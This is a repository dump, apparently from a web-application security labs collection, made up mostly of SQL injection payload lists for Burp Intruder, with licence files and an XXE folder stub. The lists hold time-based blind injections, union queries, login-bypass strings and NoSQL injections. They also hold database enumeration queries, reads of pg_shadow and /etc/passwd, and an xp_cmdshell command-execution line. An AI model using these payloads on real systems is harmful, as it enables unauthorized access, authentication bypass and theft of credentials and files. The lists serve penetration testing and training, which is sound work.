| ") or sleep(__TIME__)=" 9 | ') or sleep(__TIME__)=' 10 | 1)) or sleep(__TIME__)# 11 | ")) or sleep(__TIME__)=" 12 | ')) or sleep(__TIME__)=' 13 | ;waitfor delay '0:0:__TIME__'-- 14 | );waitfor delay '0:0:__TIME__'-- 15 | ';waitfor delay '0:0:__TIME__'-- 16 | ";waitfor delay '0:0:__TIME__'-- 17 | ');waitfor delay '0:0:__TIME__'-- 18 | ");waitfor delay '0:0:__TIME__'-- 19 | ));waitfor delay '0:0:__TIME__'-- 20 | '));waitfor delay '0:0:__TIME__'-- 21 | "));waitfor delay '0:0:__TIME__'-- 22 | benchmark(10000000,MD5(1))# 23 | 1 or benchmark(10000000,MD5(1))# 24 | " or benchmark(10000000,MD5(1))# 25 | ' or benchmark(10000000,MD5(1))# 26 | 1) or benchmark(10000000,MD5(1))# 27 | ") or benchmark(10000000,MD5(1))# 28 | ') or benchmark(10000000,MD5(1))# 29 | 1)) or benchmark(10000000,MD5(1))# 30 | ")) or benchmark(10000000,MD5(1))# 31 | ')) or benchmark(10000000,MD5(1))# 32 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/MSSQL/MSSQL.txt: -------------------------------------------------------------------------------- 1 | ; -- 2 | '; -- 3 | '); -- 4 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 5 | ' grant connect to name; grant resource to name; -- 6 | ' or 1=1 -- 7 | ' union (select @@version) -- 8 | ' union (select NULL, (select @@version)) -- 9 | ' union (select NULL, NULL, (select @@version)) -- 10 | ' union (select NULL, NULL, NULL, (select @@version)) -- 11 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 12 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 13 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/MSSQL/MSSQL_blind.txt: -------------------------------------------------------------------------------- 1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- 2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- 3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- 4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- 5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- 6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- 8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- 9 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/MySQL/MySQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | 1or1=1 8 | 1'or'1'='1 9 | fake@ema'or'il.nl'='il.nl 10 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/MySQL/MySQL_MSSQL.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1 and user_name() = 'dbo' 3 | \'; desc users; -- 4 | 1\'1 5 | 1' and non_existant_table = '1 6 | ' or username is not NULL or username = ' 7 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 8 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 9 | 1 uni/**/on select all from where 10 | 11 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/detect/NoSQL/no-sql.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | [$ne]=1 18 | ';sleep(5000); 19 | ';sleep(5000);' 20 | ';sleep(5000);+' 21 | ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/DB2/db2-enumeration.txt: -------------------------------------------------------------------------------- 1 | select versionnumber, version_timestamp from sysibm.sysversions; 2 | select user from sysibm.sysdummy1; 3 | select session_user from sysibm.sysdummy1; 4 | select system_user from sysibm.sysdummy1; 5 | select current server from sysibm.sysdummy1; 6 | select name from sysibm.systables; 7 | select grantee from syscat.dbauth; 8 | select * from syscat.tabauth; 9 | select * from syscat.dbauth where grantee = current user; 10 | select * from syscat.tabauth where grantee = current user; 11 | select name, tbname, coltype from sysibm.syscolumns; 12 | SELECT schemaname FROM syscat.schemata; 13 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/MSSQL/ms-sql-enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/sql-injection/sql-injection-payload-list/Intruder/exploit/MSSQL/ms-sql-enumeration.txt -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/MySQL/mysql-injection-login-bypass.txt: -------------------------------------------------------------------------------- 1 | ' OR 1=1-- 2 | 'OR '' = ' Allows authentication without a valid username. 3 | '-- 4 | ' union select 1, '', '' 1-- 5 | 'OR 1=1-- 6 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/MySQL/mysql-read-local-files.txt: -------------------------------------------------------------------------------- 1 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 2 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/exploit/PostgresSQL/postgres-enumeration.txt: -------------------------------------------------------------------------------- 1 | select version(); 2 | select current_database(); 3 | select current_user; 4 | select session_user; 5 | select current_setting('log_connections'); 6 | select current_setting('log_statement'); 7 | select current_setting('port'); 8 | select current_setting('password_encryption'); 9 | select current_setting('krb_server_keyfile'); 10 | select current_setting('virtual_host'); 11 | select current_setting('port'); 12 | select current_setting('config_file'); 13 | select current_setting('hba_file'); 14 | select current_setting('data_directory'); 15 | select * from pg_shadow; 16 | select * from pg_group; 17 | create table myfile (input TEXT); 18 | copy myfile from '/etc/passwd'; 19 | select * from myfile;copy myfile to /tmp/test; 20 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/payloads-sql-blind/MSSQL/payloads-sql-blind-MSSQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/payloads-sql-blind/MySQL/payloads-sql-blind-MySQL-ORDER_BY.txt: -------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/Intruder/payloads-sql-blind/MySQL/payloads-sql-blind-MySQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /sql-injection/sql-injection-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /xml-external-entity-xxe-injection/xxe-injection-payload-list/Image/xxe-injection.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/xml-external-entity-xxe-injection/xxe-injection-payload-list/Image/xxe-injection.jpg -------------------------------------------------------------------------------- /xml-external-entity-xxe-injection/xxe-injection-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | --------------------------------------------------------------------------------